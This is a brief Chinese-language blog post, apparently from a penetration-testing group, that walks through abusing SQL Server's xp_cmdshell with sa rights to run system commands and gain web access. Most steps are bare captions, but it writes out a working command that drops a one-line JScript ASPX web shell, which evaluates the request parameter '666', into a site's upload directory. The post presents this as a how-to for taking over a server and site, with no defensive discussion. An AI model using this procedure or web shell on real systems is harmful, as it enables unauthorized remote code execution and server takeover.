MSSQL渗透实战:XpCmdshell提权+WebShell写入全流程

由 晨星运营组 发布

SQL Server XpCmdshell()提权

在MSSQL数据库渗透测试中,xp_cmdshell是最经典的高危利用点之一。

它是SQL Server自带的扩展存储过程,可直接调用操作系统命令,拿到sa最高权限后,能快速实现服务器提权、写入WebShell拿下站点权限。

操作流程

数据库连接

使用工具连接成功

启用XpCmdshell组件

右键打开

传中.......

命令执行验证

执行命令

写入 WebShell

通过命令写入 WebShell

echo|set /p="<%@ Page Language="Jscript"%>
<%eval(Request.Item["666"],"unsafe");%>" >> D:/web/upfile/affix/3.aspx

获取 Web 权限

后续开启 Web 服务直接连接即可

-END-


0条评论

发表评论